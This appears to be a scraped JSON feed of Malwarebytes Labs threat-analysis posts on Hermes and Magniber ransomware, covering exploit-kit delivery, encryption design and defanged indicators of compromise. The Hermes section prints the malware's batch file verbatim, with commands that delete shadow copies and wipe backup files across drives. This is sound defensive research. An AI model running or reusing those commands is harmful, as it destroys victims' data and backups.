bin.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/drivetyupe-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/drivetyupe-1.png> \"\" )\n\nInside of the function labeled recursiveSearch_Encrypt are the checks for key folders and drive type:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/keydiresCheck-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/keydiresCheck-1.png> \"\" )\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/keydirchec2-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/keydirchec2-1.png> \"\" )\n\nIt then continues on to enumerate netResources and encrypts those files as well. After encryption, it creates another bat file called **window.bat **to delete shadow volume and backup files. Here is its content:\n \n \n vssadmin Delete Shadows /all /quiet\n vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB\n vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded\n vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB\n vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded\n vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB\n vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded\n vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB\n vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded\n vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB\n vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded\n vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB\n vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded\n vssadmin Delete Shadows /all /quiet\n del /s /f /q c:\\*.VHD c:\\*.bac c:\\*.bak c:\\*.wbcat c:\\*.bkf c:\\Backup*.* c:\\backup*.* c:\\*.set c:\\*.win c:\\*.dsk\n del /s /f /q d:\\*.VHD d:\\*.bac d:\\*.bak d:\\*.wbcat d:\\*.bkf d:\\Backup*.* d:\\backup*.* d:\\*.set d:\\*.win d:\\*.dsk\n del /s /f /q e:\\*.VHD e:\\*.bac e:\\*.bak e:\\*.wbcat e:\\*.bkf e:\\Backup*.* e:\\backup*.* e:\\*.set e:\\*.win e:\\*.dsk\n del /s /f /q f:\\*.VHD f:\\*.bac f:\\*.bak f:\\*.wbcat f:\\*.bkf f:\\Backup*.* f:\\backup*.* f:\\*.set f:\\*.win f:\\*.dsk\n del /s /f /q g:\\*.VHD g:\\*.bac g:\\*.bak g:\\*.wbcat g:\\*.bkf g:\\Backup*.* g:\\backup*.* g:\\*.set g:\\*.win g:\\*.dsk\n del /s /f /q h:\\*.VHD h:\\*.bac h:\\*.bak h:\\*.wbcat h:\\*.bkf h:\\Backup*.* h:\\backup*.* h:\\*.set h:\\*.win h:\\*.dsk\n del %0\n \n\nIt then creates and executes another bat file called **svchostaaexe.bat **that cycles through the entire file system again to search for and delete all backup files. This is interesting, as we have rarely seen ransomware looking in so much detail for backup files.\n\nThere is no functionality that communicates a decryption key to a C2 server. This means that the file UNIQUE_ID_DO_NOT_REMOVE, which** **contains the unique ID you have to send to the email address, must be encrypted by a public key pair that the attackers have pre-generated and retained on their side.\n\nWe have found that there is a heavy code reuse from the old versions of Hermes with this one. The flow of the code looks to be a bit different, but the overall functionality is the same. This is quite clear when comparing the two versions in a disassembler.\n\nBelow are two screenshots: the first from the current version we are analyzing, and the second from the old version. You can clearly see that even though the flow and arrangement are a bit different, the functionality remains mostly the same.\n\nThe new version:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/new-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/new-1.png> \"\" )\n\nAnd the old version **237eee069c1df7b69cee2cc63dee24e6**:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/old-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/old-1.png> \"\" )\n\n### Attacked targets\n\nThe ransomware attacks the following extensions: \n` \ntif php 1cd 7z cd 1cd dbf ai arw txt doc docm docx zip rar xlsx xls xlsb xlsm jpg jpe jpeg bmp db eql sql adp mdf frm mdb odb odm odp ods dbc frx db2 dbs pds pdt pdf dt cf cfu mxl epf kdbx erf vrp grs geo st pff mft efd 3dm 3ds rib ma max lwo lws m3d mb obj x x3d c4d fbx dgn dwg 4db 4dl 4mp abs adn a3d aft ahd alf ask awdb azz bdb bib bnd bok btr bak cdb ckp clkw cma crd dad daf db3 dbk dbt dbv dbx dcb dct dcx ddl df1 dmo dnc dp1 dqy dsk dsn dta dtsx dxl eco ecx edb emd fcd fic fid fil fm5 fol fp3 fp4 fp5 fp7 fpt fzb fzv gdb gwi hdb his ib idc ihx itdb itw jtx kdb lgc maq mdn mdt mrg mud mwb s3m myd ndf ns2 ns3 ns4 nsf nv2 nyf oce oqy ora orx owc owg oyx p96 p97 pan pdb pdm phm pnz pth pwa qpx qry qvd rctd rdb rpd rsd sbf sdb sdf spq sqb stp str tcx tdt te tmd trm udb usr v12 vdb vpd wdb wmdb xdb xld xlgc zdb zdc cdr cdr3 ppt pptx abw act aim ans apt asc ase aty awp awt aww bad bbs bdp bdr bean bna boc btd cnm crwl cyi dca dgs diz dne docz dot dotm dotx dsv dvi dx eio eit emlx epp err etf etx euc faq fb2 fbl fcf fdf fdr fds fdt fdx fdxt fes fft flr fodt gtp frt fwdn fxc gdoc gio gpn gsd gthr gv hbk hht hs htc hwp hz idx iil ipf jis joe jp1 jrtf kes klg knt kon kwd lbt lis lit lnt lp2 lrc lst ltr ltx lue luf lwp lyt lyx man map mbox me mell min mnt msg mwp nfo njx now nzb ocr odo odt ofl oft ort ott p7s pfs pfx pjt prt psw pu pvj pvm pwi pwr qdl rad rft ris rng rpt rst rt rtd rtf rtx run rzk rzn saf sam scc scm sct scw sdm sdoc sdw sgm sig sla sls smf sms ssa stw sty sub sxg sxw tab tdf tex text thp tlb tm tmv tmx tpc tvj u3d u3i unx uof uot upd utf8 utxt vct vnt vw wbk wcf wgz wn wp wp4 wp5 wp6 wp7 wpa wpd wpl wps wpt wpw wri wsc wsd wsh wtx xdl xlf xps xwp xy3 xyp xyw ybk yml zabw zw abm afx agif agp aic albm apd apm apng aps apx art asw bay bm2 bmx brk brn brt bss bti c4 cal cals can cd5 cdc cdg cimg cin cit colz cpc cpd cpg cps cpx cr2 ct dc2 dcr dds dgt dib djv djvu dm3 dmi vue dpx wire drz dt2 dtw dvl ecw eip exr fal fax fpos fpx g3 gcdp gfb gfie ggr gif gih gim spr scad gpd gro grob hdp hdr hpi i3d icn icon icpr iiq info ipx itc2 iwi j j2c j2k jas jb2 jbig jbmp jbr jfif jia jng jp2 jpg2 jps jpx jtf jwl jxr kdc kdi kdk kic kpg lbm ljp mac mbm mef mnr mos mpf mpo mrxs myl ncr nct nlm nrw oc3 oc4 oc5 oci omf oplc af2 af3 asy cdmm cdmt cdmz cdt cgm cmx cnv csy cv5 cvg cvi cvs cvx cwt cxf dcs ded dhs dpp drw dxb dxf egc emf ep eps epsf fh10 fh11 fh3 fh4 fh5 fh6 fh7 fh8 fif fig fmv ft10 ft11 ft7 ft8 ft9 ftn fxg gem glox hpg hpgl hpl idea igt igx imd ink lmk mgcb mgmf mgmt mt9 mgmx mgtx mmat mat otg ovp ovr pcs pfv pl plt vrml pobj psid rdl scv sk1 sk2 ssk stn svf svgz sxd tlc tne ufr vbr vec vml vsd vsdm vsdx vstm stm vstx wpg vsm xar yal orf ota oti ozb ozj ozt pal pano pap pbm pc1 pc2 pc3 pcd pdd pe4 pef pfi pgf pgm pi1 pi2 pi3 pic pict pix pjpg pm pmg pni pnm pntg pop pp4 pp5 ppm prw psdx pse psp ptg ptx pvr px pxr pz3 pza pzp pzs z3d qmg ras rcu rgb rgf ric riff rix rle rli rpf rri rs rsb rsr rw2 rwl s2mv sci sep sfc sfw skm sld sob spa spe sph spj spp sr2 srw ste sumo sva save ssfn t2b tb0 tbn tfc tg4 thm tjp tm2 tn tpi ufo uga vda vff vpe vst wb1 wbc wbd wbm wbmp wbz wdp webp wpb wpe wvl x3f y ysp zif cdr4 cdr6 cdrw ddoc css pptm raw cpt pcx pdn png psd tga tiff tif xpm ps sai wmf ani flc fb3 fli mng smil svg mobi swf html csv xhtm dat \n`\n\n### Encryption\n\nHermes, like many other ransomware, uses AES along with RSA for the encryption. AES is used to encrypt files with a random key. RSA is used to protect the random AES key.\n\nThe ransomware uses two RSA key pairs, one being a RSA hardcoded public key for the attackers.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/hardcoded_key-1-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/hardcoded_key-1-1.png> \"\" )\n\nThen, there is a keypair for the victim. It is generated at the beginning of the attack. The private key from this key pair is encrypted by the attackers' public key and stored in the file UNIQUE_ID_DO_NOT_REMOVE.\n\nWhen the victim sends this file, the attackers can recover the victim's private key with the help of their own private key. The victim's public key is stored in PUBLIC in clear text. It is later used to encrypt random AES keys, generated per file.\n\nCryptography is implemented with the help of Windows Crypto API. Function calls are mildly obfuscated, and pointers to the functions are manually loaded.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/ms_provider-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/ms_provider-1.png> \"\" )\n\nEach file processing starts from checking if it was already encrypted. The ransomware uses the saved marker \"HERMES\" that we already saw during the behavioral analysis. The marker is stored at the end of the file, before the block where the AES key is saved. Its offset is 274 bytes from the end. So, first the file pointer is set at this position to make a check of the characters.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/marker_check-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/marker_check-1.png> \"\" )\n\nIf the marker was found, the file is skipped. Otherwise, it is processed further. As we noticed during the behavioral analysis, each file is encrypted with a new key. Looking at the code, we can find the responsible function. Unfortunately for the victims, the authors used the secure function [CryptGenKey](<https://msdn.microsoft.com/en-us/library/windows/desktop/aa379941\$v=vs.85\$.aspx>):\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/generate_key-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/generate_key-1.png> \"\" )\n\nThe used identifier for the algorithm is 0x6610 ([CALG_AES_256](<https://msdn.microsoft.com/en-us/library/windows/desktop/aa375549\$v=vs.85\$.aspx>)). That means 256-bit is using AES encryption. This key is used to encrypt the content of the file. The file is read and encrypted in chunks, with 1,000,000 bytes each.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/file_encrypt-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/file_encrypt-1.png> \"\" )\n\nAt the end, the marker \"HERMES\" is written and the exported AES key is saved:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/export_key_and_write-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/export_key_and_write-1.png> \"\" )\n\nThe handle to the attacker's RSA public key is passed, so the function [CryptExportKey](<https://msdn.microsoft.com/en-us/library/windows/desktop/aa379931\$v=vs.85\$.aspx>) automatically takes care of protecting the AES key. Only the owner of the RSA private key will be able to import it back.\n\n### Protection\n\nMalwarebytes users are protected against this Flash Player exploit. In addition, the ransomware payload was blocked at zero-hour strictly based on its malicious behaviour.\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/block_hermes_ransom.png)\n\n### Conclusion\n\nAnother campaign that we know of targeting South Koreans specifically is carried by malvertising and uses the Magnitude exploit kit, which also delivers ransomware\u2014namely [Magniber](<https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/>). That particular infection chain goes to great lengths to only infect this particular demographic, via geo-aware traffic redirection and language checks within the malware code itself.\n\nAfter analyzing Hermes, we found it to be a fully functional ransomware. However, we cannot be sure what the real motivations of the distributors were. Looking at the full context, we may suspect that it was politically motivated rather than a profit-driven attack.\n\nAlthough the infection vector appeared to narrow down to South Korea, the malware itself, unlike Magniber, does not specifically target these users. The fact that the ransomware excludes certain countries like Russia or Ukraine could tie the development and outsourcing of the malware to these areas or be a false flag. As we know, attribution is always a complex topic.\n\n### Indicators of compromise\n\nDomains involved in campaign:\n\n * 2018-02-27 (01:54 UTC)\n * staradvertsment[.]com\n * hunting.bannerexposure[.]info\n * 2018-02-28\n * staradvertsment[.]com\n * accompanied.bannerexposure[.]info\n * 2018-03-01 \n * switzerland.innovativebanner[.]info\n * 2018-03-07 \n * name.secondadvertisements[.]com\n * 2018-03-08 \n * assessed.secondadvertisements[.]com\n * marketing.roadadvertisements[.]com\n * 2018-03-09 \n * bannerssale[.]com\n * aquaadvertisement[.]com\n * technologies.roadadvertisements[.]com\n\nIP addresses:\n\n * 159.65.131[.]94\n * 159.65.131[.]94\n * 207.148.104[.]5\n\nHermes 2.1 ransomware:\n\n * A5A0964B1308FDB0AEB8BD5B2A0F306C99997C7C076D66EB3EBCDD68405B1DA2\n * pretty040782@gmail[.]com\n * pretty040782@keemail[.]me\n\nThe post [Hermes ransomware distributed to South Koreans via recent Flash zero-day](<https://blog.malwarebytes.com/threat-analysis/2018/03/hermes-ransomware-distributed-to-south-koreans-via-recent-flash-zero-day/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-14T17:59:32", "type": "malwarebytes", "title": "Hermes ransomware distributed to South Koreans via recent Flash zero-day", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4878"], "modified": "2018-03-14T17:59:32", "id": "MALWAREBYTES:E0E596B13A84774F12BFB5962B091DCE", "href": "https://blog.malwarebytes.com/threat-analysis/2018/03/hermes-ransomware-distributed-to-south-koreans-via-recent-flash-zero-day/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-07-16T18:29:27", "description": "_This blog post was authored by [@hasherezade](<https://twitter.com/hasherezade>) and [J\u00e9r\u00f4me Segura](<https://blog.malwarebytes.com/author/jeromesegura/>)._\n\nThe Magnitude exploit kit is one of the longest-serving browser exploitation toolkits among those still in use. After its inception in [2013](<https://malware.dontneedcoffee.com/2013/10/Magnitude.html>), it enjoyed worldwide distribution with a liking for ransomware. Eventually, it became a private operation that had a narrow geographic focus.\n\nDuring 2017, Magnitude delivered Cerber ransomware via a [filtering gate](<https://blog.malwarebytes.com/cybercrime/2017/08/enemy-at-the-gates-reviewing-the-magnitude-exploit-kit-redirection-chain/>) known as [Magnigate](<https://www.proofpoint.com/us/threat-insight/post/magnitude-actor-social-engineering-scheme-windows-10>), only to a select few Asian countries. In October 2017, the exploit kit operator began to distribute its own breed of ransomware, [Magniber](<https://twitter.com/kafeine/status/920252764600635392>). That change came with an interesting twist\u2014the malware authors went to great lengths to [limit infections to South Korea](<https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/>). In addition to traffic filtering via country-specific malvertising chains, Magniber would only install if a specific country code was returned, otherwise it would delete itself.\n\nIn April 2018, Magnitude unexpectedly started [pushing the ever-growing GandCrab ransomware](<https://blog.malwarebytes.com/threat-analysis/2018/04/magnitude-exploit-kit-switches-gandcrab-ransomware/>), shortly after having [adopted](<https://twitter.com/kafeine/status/980505556715786242>) a fresh Flash zero-day ([CVE-2018-4878](<https://blog.malwarebytes.com/cybercrime/2018/02/new-flash-player-zero-day-comes-inside-office-document/>)). What may have been a test campaign did not last long, and shortly after, Magniber was back again. In our recent captures of Magnitude, we now see the latest Internet Explorer exploit ([CVE-2018-8174](<https://blog.malwarebytes.com/threat-analysis/2018/05/internet-explorer-zero-day-browser-attack/>)) being used primarily, which it [integrated](<https://twitter.com/kafeine/status/1002881951060160512>) after a week-long traffic interruption.\n\nIn this post, we take a look at some notable changes with Magniber. Its source code is now more refined, leveraging various obfuscation techniques and no longer dependent on a Command and Control server or hardcoded key for its encryption routine. In addition, while Magniber previously only targeted South Korea, it has now expanded its reach to other Asia Pacific countries.\n\n### Extracting the payload\n\n * [72fce87a976667a8c09ed844564adc75](<https://www.virustotal.com/#/file/6e57159209611f2531104449f4bb86a7621fb9fbc2e90add2ecdfbe293aa9dfc/details>) - loader DLL \n * [19599cad1bbca18ac6473e64710443b7](<https://www.virustotal.com/#/file/fb6c80ae783c1881487f2376f5cace7532c5eadfc170b39e06e17492652581c2/details>) - Magniber's core DLL\n\nThere are several stages before the final payload is downloaded and executed. After Magnigate's 302 redirection (Step 1), we see a Base64 obfuscated JavaScript (Step 2) used to launch Magnitude's landing page, along with a Base64 encoded VBScript. (Both original versions of the scripts are available at the end of this post in the IOCs.) After CVE-2018-8174's exploitation, the XOR-encrypted Magniber is retrieved.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/Magnitude_EK_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/Magnitude_EK_.png> \"\" )\n\n_Figure 1. Traffic view of a Magniber infection, via Magnigate redirection and Magnitude EK_\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/js_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/js_.png> \"\" )\n\n_Figure 2. Decoded Javascript shows redirection to Magnitude's landing page_\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/CVE-2018-8174.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/CVE-2018-8174.png> \"\" )\n\n_Figure 3. VBScript code snippet showing part of CVE-2018-8174_\n\nOnce exploitation of the Use After Free vulnerability in Internet Explorer (CVE-2018-8174) is successful, the VBScript will execute the following shellcode:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/array_shc_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/array_shc_.png> \"\" )\n\n_Figure 4. Byte array (shellcode)_\n\nFunctionality-wise, this shellcode is a simple downloader. It downloads the obfuscated payload, decodes it by XOR with a key, and then deploys it:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/open_url_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/open_url_.png> \"\" )\n\n_Figure 5. Downloading the final payload via InternetOpenUrlw API_\n\nThe downloaded payload ([72fce87a976667a8c09ed844564adc75](<https://www.virustotal.com/#/file/6e57159209611f2531104449f4bb86a7621fb9fbc2e90add2ecdfbe293aa9dfc/details>)) is, however, still not the Magniber core, but a next stage loader. This loader unpacks the Magniber's core DLL ([19599cad1bbca18ac6473e64710443b7](<https://www.virustotal.com/#/file/fb6c80ae783c1881487f2376f5cace7532c5eadfc170b39e06e17492652581c2/details>)) and injects it into a process.\n\nBoth elements, the loader and Magniber core, are DLLs with Reflective Loader stub, that load themselves into a current process using the [Reflective DLL injection](<https://github.com/stephenfewer/ReflectiveDLLInjection>) technique.\n\n### Behavioral analysis\n\nThe actions performed by Magniber haven't changed much; it encrypts files and at the end drops a ransom note named README.txt.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/ransom_note_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/ransom_note_.png> \"\" )\n\n_Figure 6. Ransom note left on the infected machine_\n\nThe given links lead to an onion page that is unique per victim and similar to many other ransomware pages:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/victim_page_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/victim_page_.png> \"\" )\n\n_Figure 7. Magniber's payment page_\n\nThe files encrypted by this version of Magniber can be identified by their extension: `.dyaaghemy`. While in the past each file was encrypted with the same AES key, this time each file is encrypted with a unique key\u2014the same plaintext gives a different ciphertext. The encrypted content has no patterns visible. That suggests that a stream cipher or a cipher with chained blocks was used (probably AES in CBC mode). Below you can see a BMP file before and after being encrypted by Magniber:\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/BMP.png)\n\n_Figure 8. Visualizing a file before and after encryption_\n\n### Code changes\n\nMagniber is constantly evolving with big portions of its code fully rewritten over time. Below you can see a code comparison between the current Magniber DLL and an earlier version ([8a0244eedee8a26139bea287a7e419d9](<https://www.virustotal.com/#/file/8968c1b7a7aa95931fcd9b72cdde8416063da27565d5308c818fdaafddfa3b51/details>)), created with the help of BinDiff:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/magni_compare_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/magni_compare_.png> \"\" )\n\n_Figure 9. Comparing an older Magniber with the newer one_\n\n#### Obfuscation\n\nThe authors put a lot of effort in improving obfuscation. [The first version we described](<https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/>) was not obfuscated at all. The current, in contrast, is obfuscated using a few different techniques. First of all, API functions are now dynamically retrieved by their checksums. For example:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/retrieve_func_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/retrieve_func_.png> \"\" )\n\n_Figure 10. Calling API functions via checksum_\n\nComparing the new and the old version, we can see some overlapping fragments of code:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/similarities.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/similarities.png> \"\" )\n\n_Figure 11. Old version with normal import calls vs. new version with dynamically retrieved functions_\n\nThe function pointer is retrieved by searching through export tables of the DLLs that are currently loaded. This technique requires that the DLL from which we want to retrieve the function to be already loaded. This algorithm of retrieving function was added to Magniber a few months ago, for example in the sample [60af42293d2dbd0cc8bf1a008e06f394](<https://www.virustotal.com/#/file/c6d5b0b475bcd9448fa7332140863e1747c97f33bab6d175024cb4b0c39c6b75/details>).\n\nIn addition, some of the parameters for the calls are dynamically calculated and junk code is added in between the operations. A string that is supposed to be loaded is scattered through several variables.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/load_lib_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/load_lib_.png> \"\" )\n\n_Figure 12. Adding junk code to make analysis more tricky_\n\n#### File encryption\n\nWe can also observe some changes at the functionality level. [The early versions](<https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/>) relied on the AES key downloaded from the CnC server (and in case if it was not available, falling back to the hardcoded one, making decryption trivial in such case). This time, Magniber comes with a public RSA key of the attackers that makes it fully independent from the Internet connection during the encryption process. This key is used for protecting the unique AES keys used to encrypt files.\n\nThe attacker's RSA key is hardcoded in the sample in obfuscated form. This is how it looks after deobfuscation:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/rsa_key_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/rsa_key_.png> \"\" )\n\n_Figure 13. Deobfuscated RSA key_\n\nEach time a new file is going to be encrypted, two 16-byte long strings are generated. One will be used as an AES key, and another as an initialization vector (IV). Below you can see the fragment of code responsible for generating those pseudo-random strings.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/key_iv_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/key_iv_.png> \"\" )\n\n_Figure 14. Generating pseudo-random strings_\n\nThe interesting fact is what they use as a random generator\u2014a weak source of randomness may create a vulnerability. We can see that under the hood [GetTickCount](<https://msdn.microsoft.com/pl-pl/library/windows/desktop/ms724408\$v=vs.85\$.aspx>) is called:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/to_next_val_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/to_next_val_.png> \"\" )\n\n_Figure 15. Random generator using GetTickCount_\n\nThe full reconstruction of the code generating the key and IV is available in the following snippet: <https://gist.github.com/hasherezade/7fb69fbd045315b42d7f962a83fdc300>\n\nBefore the ransomware proceeds to encrypt the file, the RSA key is imported and used to encrypt the generated data (key+IV):\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/key_encrypt_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/key_encrypt_.png> \"\" )\n\n_Figure 16. RSA key import right before file encryption begins_\n\nIt produces an encrypted block of 256 bytes that is passed to the encrypting function, and later appended at the end of the encrypted file. Apart from those changes, files are encrypted similar [to before](<https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/>), with the help of Windows' Crypto API.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/setting_key_iv_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/setting_key_iv_.png> \"\" )\n\n_Figure 16. Setting the AES key and initialization vector_\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/encrypt_and_write_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/encrypt_and_write_.png> \"\" )\n\n_Figure 17. Encrypting and writing to a file_\n\n### Geographic expansion\n\nIn early July, we noted exploit attempts happening outside of the typical area we had become used to, for instance in Malaysia. At about the same time, a [tweet](<https://twitter.com/malwrhunterteam/status/1014866211174264837>) from MalwareHunterTeam mentioned infections in Taiwan and Hong Kong.\n\nFollowing the changes in the distribution scope, the code of Magniber got updated to whitelist more languages. Now the list expanded, adding other Asian languages, such as Chinese (Macau, China, Singapore) and Malay (Malysia, Brunei).\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/languages_set_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/languages_set_.png> \"\" )\n\n_Figure 17. Expanded language checks_\n\n### Continuing evolution\n\nWhile Magniber was not impressive at first, having simple code and no obfuscation, it is actively developed and its quality continuously improves. Their authors appear professional, even though they commit some mistakes.\n\nThis ransomware operation is carried with surgical precision, from a careful distribution to a matching whitelist of languages. Criminals know exactly which countries they want to target, and they put their efforts to minimize noise and reduce collateral damage.\n\n[Malwarebytes](<https://www.malwarebytes.com/>) users are protected against this threat thanks to our anti-exploit module, which blocks Magnitude EK's attempt to exploit CVE-2018-8174 (VBScript engine vulnerability):\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/Magnitude_Block.gif)](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/Magnitude_Block.gif> \"\" )\n\n_Thanks to [David Ledbetter](<https://twitter.com/ledtech3>) for his help with deobfuscating the VBScript._\n\n### Indicators of compromise (IOCs)\n \n \n 178.32.62[.]130,bluehuge[.]expert,Magnigate (Step 1)\n 94.23.165[.]192,69a5010hbjdd722q.feedrun[.]online,Magnigate (Step 2)\n 92.222.121[.]30,08taw3c6143ce.nexthas[.]rocks,Magnitude EK (Landing Page)\n 149.202.112[.]72,Magniber\n\nCode snippets\n\n * _[Javascript](<https://gist.github.com/malwarezone/62e765a5d238360af68c9ca654cc4513#file-3-vb>)_\n * _[VBScript](<https://gist.github.com/malwarezone/62e765a5d238360af68c9ca654cc4513#file-4-vb>)_\n\nMagniber (original)\n \n \n 6e57159209611f2531104449f4bb86a7621fb9fbc2e90add2ecdfbe293aa9dfc\n\nMagniber (core DLL)\n \n \n fb6c80ae783c1881487f2376f5cace7532c5eadfc170b39e06e17492652581c2\n\nThe post [Magniber ransomware improves, expands within Asia](<https://blog.malwarebytes.com/threat-analysis/2018/07/magniber-ransomware-improves-expands-within-asia/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-16T17:00:16", "type": "malwarebytes", "title": "Magniber ransomware improves, expands within Asia", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4878", "CVE-2018-8174"], "modified": "2018-07-16T17:00:16", "id": "MALWAREBYTES:1EF2E06811A91F2948F835D21FF698ED", "href": "https://blog.malwarebytes.com/threat-analysis/2018/07/magniber-ransomware-improves-expands-within-asia/", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-24T18:24:19", "description": "[Exploit kit](<https://blog.malwarebytes.com/glossary/exploit-kit/>) (EK) activity continues to surprise us as the weather cools, the leaves change, and we move into the fall of 2018. 